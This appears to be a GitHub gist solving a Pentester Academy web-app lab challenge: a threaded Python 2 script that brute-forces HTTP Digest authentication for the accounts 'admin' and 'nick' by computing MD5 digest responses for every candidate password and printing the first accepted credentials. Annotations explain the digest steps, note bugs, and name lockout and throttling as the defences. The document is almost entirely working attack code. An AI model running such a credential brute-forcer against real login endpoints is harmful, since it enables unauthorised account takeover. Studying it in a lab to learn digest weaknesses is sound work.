
@yesecurity
Last active December 23, 2015 13:19
SecurityTube WAP_Challenge 6
from threading import Thread
from httplib2 import Http
import sys
import requests
import md5
import itertools
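# Lab endpoint protected by HTTP Digest authentication; note the scheme is
# plain http://, so the challenge and Authorization headers travel unencrypted.
url = "http://pentesteracademylab.appspot.com/lab/webapp/digest2/1"

# Candidate passwords: every 5-character string over the alphabet {x, y, z},
# in lexicographic order ("xxxxx" ... "zzzzz"), 3**5 = 243 entries in total.
# The whole space fits in a few hundred requests per account, so the only
# server-side controls that would matter here are a stronger password policy
# and throttling or lockout on repeated failed digest attempts.
# Built with a comprehension so the loop no longer rebinds the name of the
# sequence it is iterating and no throwaway list of tuples is materialised.
listp = [''.join(combo) for combo in itertools.product(['x', 'y', 'z'], repeat=5)]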
def brute(user):
    """Try every candidate in ``listp`` as the digest password for ``user``.

    For each candidate the function requests ``url`` to obtain a server nonce
    from the ``WWW-Authenticate`` header, computes the digest response
    MD5(HA1:nonce:HA2), and repeats the request with an
    ``Authorization: Digest`` header. The first reply whose status is not
    "401" is printed as a hit and ``sys.exit(1)`` is called.

    Args:
        user: account name placed in the digest ``username`` field.

    NOTE(review): this listing had lost its indentation; the nesting shown
    (whole body inside the ``for``, prints and exit inside the ``if``) is the
    reading that makes the code coherent -- confirm against the original.
    NOTE(review): Python 2 only (``print`` statements, the ``md5`` module).
    """
    for p in listp :
        # A new httplib2 client is created for every candidate.
        zero = Http()
        # Step 1: unauthenticated request, made only to obtain the challenge.
        r = requests.get(url)
        # Step 2: the 401 reply carries the challenge in WWW-Authenticate.
        b = r.headers.get('www-authenticate', '')
        # NOTE(review): assumes the nonce is the fourth space-separated field
        # of the header. A missing header (the '' default) or a different
        # parameter order raises IndexError here instead of being handled.
        g =b.split(" ")[3].split("nonce=")[1]
        # Drop the first and last character of the field; presumably the
        # surrounding double quotes -- TODO confirm no trailing comma occurs.
        nonce = g[1:-1]
        method = "GET"
        digestURI = "/lab/webapp/digest2/1"
        # Realm is hard-coded rather than read from the challenge.
        realm = "Pentester Academy"
        # HA1 = MD5("username:realm:password")
        h1 = (user+":"+realm+":"+p)
        ha1 = (md5.md5(h1).hexdigest())
        # HA2 = MD5("method:digestURI")
        h2 = (method+":"+digestURI)
        ha2 = (md5.md5(h2).hexdigest())
        # response = MD5("HA1:nonce:HA2")
        resp = (ha1+":"+nonce+":"+ha2)
        response = (md5.md5(resp).hexdigest())
        # Step 3: resend the request with the computed response. The header
        # carries only username, realm, nonce, uri and response -- no qop, nc
        # or cnonce -- i.e. the legacy RFC 2069-style digest form.
        # NOTE(review): the loop has no delay and no handling for lockout or
        # throttling, so it presumably only completes against a server that
        # does not limit failed digest attempts per account or per client.
        bal = {"Authorization" : 'Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s" ' % (user, realm, nonce, digestURI, response)}
        # ``resp`` and ``b`` are reused: they now hold the httplib2 response
        # object and body, then ``b`` is rebound to the status string.
        resp , b = zero.request(url,"GET" ,"",bal)
        b = resp['status']
        # NOTE(review): every status other than the string "401" counts as a
        # hit, so a 403, 429 or 5xx reply would be reported as valid
        # credentials.
        if b != "401":
            # The password that produced the non-401 reply is written to
            # stdout in cleartext.
            print "Big Thanks To Pentester Academy !"
            print "User = " + user
            print "Password = " + p
            # NOTE(review): called from a worker thread, this raises
            # SystemExit in that thread only; other workers keep running.
            # Exit status 1 conventionally signals failure, not success.
            sys.exit(1)
def main():
    """Launch one ``brute`` worker thread per hard-coded account name.

    The threads are started as ordinary (non-daemon) threads and are never
    joined here; the interpreter waits for them when the script ends.

    NOTE(review): the bare ``except`` hides any failure to start a worker,
    so an account that was never tested leaves no trace in the output.
    """
    for account in ['admin', 'nick']:
        try:
            worker = Thread(target=brute, args=(account,))
            worker.start()
        except:
            pass
# Runs on import as well as on direct execution: there is no
# ``if __name__ == "__main__":`` guard around this call.
main()